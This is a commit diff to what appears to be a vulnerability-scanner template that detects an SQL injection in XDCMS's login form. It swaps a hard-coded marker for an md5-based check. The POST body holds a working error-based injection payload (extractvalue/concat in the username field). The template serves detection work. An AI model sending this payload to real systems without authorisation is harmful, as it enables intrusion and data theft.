Update xdcms-sqli.yaml

2022-06-30 08:48:00 +05:30 · 2022-06-30 08:48:00 +05:30 · d81a48e31e
parent 28e6e03fc5
commit d81a48e31e
1 changed files with 5 additions and 4 deletions
--- a/vulnerabilities/other/xdcms-sqli.yaml
+++ b/vulnerabilities/other/xdcms-sqli.yaml
@ -8,6 +8,9 @@ info:
    - https://www.uedbox.com/post/35188/
  tags: sqli,xdcms

+variables:
+  num: "999999999"
+
 requests:
  - method: POST
    path:
@ -15,7 +18,7 @@ requests:
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
-      username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+
+      username=dd' or extractvalue(0x0a,concat(0x0a,md5({{num}})))#&password=dd&submit=+%B5%C7+%C2%BC+

    matchers-condition: and
    matchers:
@ -27,10 +30,8 @@ requests:

      - type: word
        words:
-          - "707564257851522176"
-          - "XPATH syntax error:"
+          - '{{md5({{num}})}}'
        part: body
-        condition: and

      - type: status
        status: